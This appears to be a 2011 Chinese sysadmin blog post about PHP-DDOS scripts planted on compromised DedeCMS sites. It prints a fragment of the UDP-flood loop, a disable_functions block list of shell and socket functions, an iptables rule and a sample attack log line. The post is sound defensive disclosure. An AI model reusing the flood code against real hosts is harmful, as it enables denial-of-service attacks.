您现在的位置: 首页linux+vps>正文
PHP-DDOS脚本漏洞的解决与防范
2011年11月25日 linux+vps 暂无评论

for($i=0;$i<$Sendlen;$i++){ $out .= "A"; } $max_time = time()+$exec_time; while(1){ $packets++; if(time() > $max_time or $exec_time != 18){

break;

}

$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);

if($fp){

fwrite($fp, $out);

fclose($fp);

}

}

最近服务器几个网站被入侵了,被人挂上了php-ddos脚本,不停的往外发UDP数据包,刚开始一直找不到原因,导致这两个月白白消耗了500多G的流量。。。后来才发现是因为服务器上几个dedecms的企业站被入侵后植入了ddos脚本导致的问题。

解决方案:
编辑/ect/php.ini ,禁用 fsockopen 函数,及屏蔽本机的UDP端口。

1、禁用函数:

vi编辑器打开后查找到 disable_functions ,添加需禁用的函数名,如下例:
passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen
重启apache服务后生效。

2、屏蔽UDP端口
iptables -A INPUT -p udp --sport 5000:65535 -j DROP

附如何快速找到服务器上被入侵的网站?

你可以检测流量,发现异常的时候,去下载所有的网站日志文件到本地后打开,
查找里面是否有类似这样的记录:

2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783

脚本要发数据攻击,自然会出现这类日志,找到这些脚本删除掉即可。

当然为了安全,还得查找服务器上残留的木马以及修补漏洞等。

给我留言